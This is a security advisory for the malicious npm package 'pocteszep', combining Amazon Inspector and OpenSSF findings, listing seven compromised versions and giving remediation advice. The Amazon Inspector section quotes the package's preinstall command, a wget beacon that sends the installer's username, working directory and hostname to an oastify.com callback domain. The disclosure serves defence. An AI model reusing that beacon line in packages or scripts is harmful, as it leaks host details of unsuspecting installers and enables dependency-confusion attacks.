npm · Malicious package advisory
Malwarepocteszep
MAL-2026-5544
Malicious code in pocteszep (npm)
Details
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (e13c609971d69e4699c85f451f163c7ab60ebb775171211fbd20d880b0ef2a2d) The package's npm preinstall lifecycle script runs `wget --quiet "http://78dngdm3dhrrj8zgfm4es9m8bzhq5jt8.oastify.com/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)"` (package.json line 8). On `npm install`, before any code review, the installer's username, current working directory, and hostname are sent over plaintext HTTP to a Burp Collaborator (oastify.com) callback subdomain — a typical out-of-band exfiltration channel used in dependency-confusion attacks. The package description self-identifies as a 'Simple PoC package for testing for dependency confusion vulnerabilities,' and the package contains no legitimate functionality beyond the lifecycle beacon. Any installer pulling this package via name-collision with an internal dependency leaks host identity to the attacker. ## Source: ossf-package-analysis (1724503cde62bd3c17ba606fd752f088dfb2b1c41ae612ef5074f93e9896ee00) The OpenSSF Package Analysis project identified 'pocteszep' @ 1.0.2 (npm) as malicious. It is considered malicious because: - The package communicates with a domain associated with malicious activity. - The package executes one or more commands associated with malicious behavior.
Compromised versions (7)
- 1.0.5
- 1.0.1
- 1.0.4
- 1.0.0
- 1.0.2
- 1.1.1
- 1.0.8
Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.